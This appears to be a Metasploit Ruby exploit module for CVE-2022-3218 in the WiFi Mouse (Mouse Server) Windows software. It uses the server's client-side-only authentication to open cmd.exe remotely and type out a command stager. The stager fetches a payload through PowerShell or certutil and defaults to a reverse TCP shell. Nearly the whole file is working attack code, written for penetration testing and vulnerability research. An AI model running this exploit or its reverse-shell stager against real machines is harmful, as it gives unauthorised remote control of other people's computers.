106 lines
3.2 KiB
Ruby
106 lines
3.2 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Exploit::Remote::Tcp
|
|
include Msf::Exploit::CmdStager
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Wifi Mouse RCE',
|
|
'Description' => %q{
|
|
The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the
|
|
authentication is completely implemented entirely on the client side. By utilizing
|
|
this vulnerability, is possible to open a program on the server
|
|
(cmd.exe in our case) and type commands that will be executed as the user running
|
|
WiFi Mouse (Mouse Server), resulting in remote code execution.
|
|
|
|
Tested against versions 1.8.3.4 (current as of module writing) and
|
|
1.8.2.3.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'h00die', # msf module
|
|
'REDHATAUGUST', # edb
|
|
'H4RK3NZ0' # edb, original discovery
|
|
],
|
|
'References' => [
|
|
[ 'EDB', '50972' ],
|
|
[ 'EDB', '49601' ],
|
|
[ 'CVE', '2022-3218' ],
|
|
[ 'URL', 'http://wifimouse.necta.us/' ],
|
|
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py' ]
|
|
],
|
|
'Arch' => [ ARCH_X64, ARCH_X86 ],
|
|
'Platform' => 'win',
|
|
'Targets' => [
|
|
[
|
|
'stager',
|
|
{
|
|
'CmdStagerFlavor' => ['psh_invokewebrequest', 'certutil']
|
|
}
|
|
],
|
|
],
|
|
'Payload' => {
|
|
'BadChars' => "\x0a\x00"
|
|
},
|
|
'DefaultOptions' => {
|
|
# since this may get typed out ON SCREEN we want as small a payload as possible
|
|
'PAYLOAD' => 'windows/shell/reverse_tcp'
|
|
},
|
|
'DisclosureDate' => '2021-02-25',
|
|
'DefaultTarget' => 0,
|
|
'Notes' => {
|
|
'Stability' => [CRASH_SAFE],
|
|
'Reliability' => [REPEATABLE_SESSION],
|
|
'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
|
|
}
|
|
)
|
|
)
|
|
register_options(
|
|
[
|
|
OptPort.new('RPORT', [true, 'Port WiFi Mouse Mouse Server runs on', 1978]),
|
|
OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
|
|
OptInt.new('LINEMAX', [true, 'Maximum length of lines to send for stager method. Smaller for more unstable connections.', 1_020]),
|
|
]
|
|
)
|
|
end
|
|
|
|
def send_return
|
|
sock.put('key 3RTN') # what the mobile app sends
|
|
end
|
|
|
|
def send_command(command)
|
|
sock.put("utf8 #{command}\x0A")
|
|
sleep(datastore['SLEEP'])
|
|
send_return
|
|
end
|
|
|
|
def open_file(file)
|
|
file = "/#{file}".gsub('\\', '/').gsub(':', '')
|
|
sock.put("openfile #{file}\x0A")
|
|
end
|
|
|
|
def exploit
|
|
connect
|
|
print_status('Opening command prompt')
|
|
open_file('C:\\Windows\\System32\\cmd.exe')
|
|
sleep(datastore['SLEEP']) # give time for it to open
|
|
|
|
print_status('Typing out payload')
|
|
execute_cmdstager({ linemax: datastore['LINEMAX'], delay: datastore['SLEEP'] })
|
|
|
|
handler
|
|
end
|
|
|
|
def execute_command(cmd, _opts = {})
|
|
send_command(cmd)
|
|
end
|
|
end
|